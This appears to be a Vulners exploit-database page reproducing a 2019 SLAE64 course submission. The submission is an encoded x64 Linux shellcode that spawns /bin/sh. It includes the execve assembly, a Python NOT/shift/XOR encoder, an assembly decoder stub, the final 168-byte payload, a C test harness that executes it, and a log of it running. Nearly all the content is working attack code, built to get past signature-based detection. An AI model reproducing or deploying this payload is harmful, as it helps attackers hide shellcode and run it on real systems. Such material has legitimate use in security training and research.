Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)

🗓️ 29 Jul 2019 00:00:00Reported by Pedro CabralType 
zdt
 zdt🔗 0day.today👁 15 Views

X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh shellcode by Pedro Cabral for x64 Ubuntu 16.04.6 LTS, 168 byte

Code
/*
######################################## description ########################################

; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
; Author    : Pedro Cabral
; Twitter   : @CabrallPedro
; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
; SLAE ID   : SLAE64 - 1603
; Purpose   : spawn /bin/sh shell
; Tested On : Ubuntu 16.04.6 LTS
; Arch      : x64
; Size      : 168 bytes

########################################## sh.asm ###########################################

global _start

section .text

_start:
        xor rax, rax
        push rax ; push null
        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
        push rbx ; push to the stack
        mov rdi, rsp ; store the /bin//sh on rdi
        push rax ; push null
        mov rdx, rsp ; set rdx
        push rdi ; push the address of /bin//sh
        mov rsi, rsp ; set rsi
        add rax, 59 ; rax = 59 (execve)
        syscall


#################################### original shellcode #####################################

pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
pedro@ubuntu>ld -N -o sh sh.o
pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"


########################################  encode.py  ########################################

#!/usr/bin/python

import sys

if len(sys.argv) != 3:
        print "Usage : python encode.py <SHIFT number> <XOR number>"
        sys.exit(0)

shift   = int(sys.argv[1])
xor     = int(sys.argv[2])

shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")


# addition to the inicial of the shellcode the SHIFT and XOR values
encoded_shellcode =""
encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
encoded_shellcode += '%02x, ' %shift
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor

# [NOT + SHL-N + XOR-N] encoded shellcode
for i in bytearray(shellcode):
	new = ~i & 0xff
	new = new << shift
        new = new ^ xor
        encoded_shellcode += '0x'
        encoded_shellcode += '%02x, ' %new

# end of shellcode
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x' %xor

# print encoded shellcode
print encoded_shellcode

#################################### Encoded Shellcode  #####################################

pedro@ubuntu>python encoder.py 4 1337
0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

####################################### decoder.asm  ########################################

global _start

section .text

_start:

	jmp decoder
	encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

decoder:
	lea rsi, [rel encoded]

	xor rcx, rcx
	xor r9,r9
	xor r10,r10

	mov word cx, [rsi]
	inc rsi
	inc rsi
	mov word r9w, [rsi]
	inc rsi
	inc rsi
	push rsi
	mov rdi, rsi
main: ; 			to deal with 0xff on the original shellcode
	mov word r10w,[rsi]
	xor r10w, r9w
	jz second_check
main2:
	shr r10, cl
	not word r10w
	mov byte [rdi], r10b
	inc rsi
	inc rsi
	inc rdi
	jmp short main

second_check:
	mov word r10w, [rsi+2]
	xor r10w, r9w
	jz call_encoded
	mov word r10w, [rsi]
	xor r10w, r9w
	jmp main2

call_encoded:
	call [rsp]

###################################### final shellcode ######################################

pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"

pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
pedro@ubuntu>./testShellcode 
Shellcode Length:	168
$ whoami
pedro
*/


#include<stdio.h>
#include<string.h>


unsigned char code[] = \
"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";

void main(){
	printf("Shellcode Length:	%zu\n",strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jul 2019 00:00Current
7.1High risk
Vulners AI Score7.1
shellcodepedro cabralubuntu 16.04.6 ltsx64assemblyencodingreverse engineeringbuffer overflowlinuxslae64 - 1603syscallstackexecvedecodingxorshiftlinkedin
15